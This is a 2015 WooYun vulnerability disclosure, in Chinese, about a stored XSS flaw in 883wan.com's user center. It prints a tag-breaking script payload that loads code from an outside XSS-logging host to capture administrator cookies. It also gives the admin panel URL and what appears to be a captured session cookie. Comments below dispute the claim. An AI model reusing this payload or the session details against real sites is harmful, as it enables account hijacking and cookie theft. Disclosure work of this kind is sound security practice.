当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0100412

漏洞标题:883wan用户中心xss

相关厂商:883wan.com

漏洞作者: 小杰哥

提交时间:2015-03-11 12:00

修复时间:2015-03-16 12:02

公开时间:2015-03-16 12:02

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-11: 细节已通知厂商并且等待厂商处理中
2015-03-16: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

用户中心xss 可打管理员cookie

详细说明:

直接上图吧

1.jpg

联系地址处可插入xss 只要闭合一下标签就行了。 "><script src=http://www.xss8.net/?c=uAQKz></script><"

漏洞证明:

Url:http://www.883wan.com/rk_dl.php?m=goods&a=orderinfo&menuid=562&amp;username=&start_time=2015-02-01&end_time=2015-02-28&search=鎼滅储&__hash__=4f44fabd793f72b5292983fd2c2a46c5_0a86f4aa85c6521e8781fc6adb081e9c&page=2
Cookie:Hm_lvt_9fcc962f916f52dae5822a3509014772=1425820886; pgv_pvi=5394879488; PHPSESSID=mo17a1lqeqohgbgh6a5euuqks6
后台地址:http://www.883wan.com/rk_dl.php

修复方案:

过滤

版权声明:转载请注明来源 小杰哥@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-03-16 12:02

厂商回复:

最新状态:

暂无


漏洞评价:

评论

  1. 2015-03-19 09:50 | 天地不仁 以万物为刍狗 ( 普通白帽子 | Rank:977 漏洞数:264 | 天地本不仁 万物为刍狗)

    @小杰哥 你的后台地址应该是扫描器或者是哪猜出的吧? 这里xss也能打到管理cookie和地址?太扯了把 你给我复现下怎么打到的

  2. 2015-03-19 10:06 | 天地不仁 以万物为刍狗 ( 普通白帽子 | Rank:977 漏洞数:264 | 天地本不仁 万物为刍狗)

    订单搜索。。。。你那买了什么东西?

  3. 2015-03-19 13:46 | 小杰哥 ( 普通白帽子 | Rank:155 漏洞数:25 | 逆水行舟,不进则退。)

    逗比,订单啊……

  4. 2015-03-19 13:48 | 小杰哥 ( 普通白帽子 | Rank:155 漏洞数:25 | 逆水行舟,不进则退。)

    这里插了xss然后去生成订单后台可操作订单,所以x了 这个垃圾厂商来的……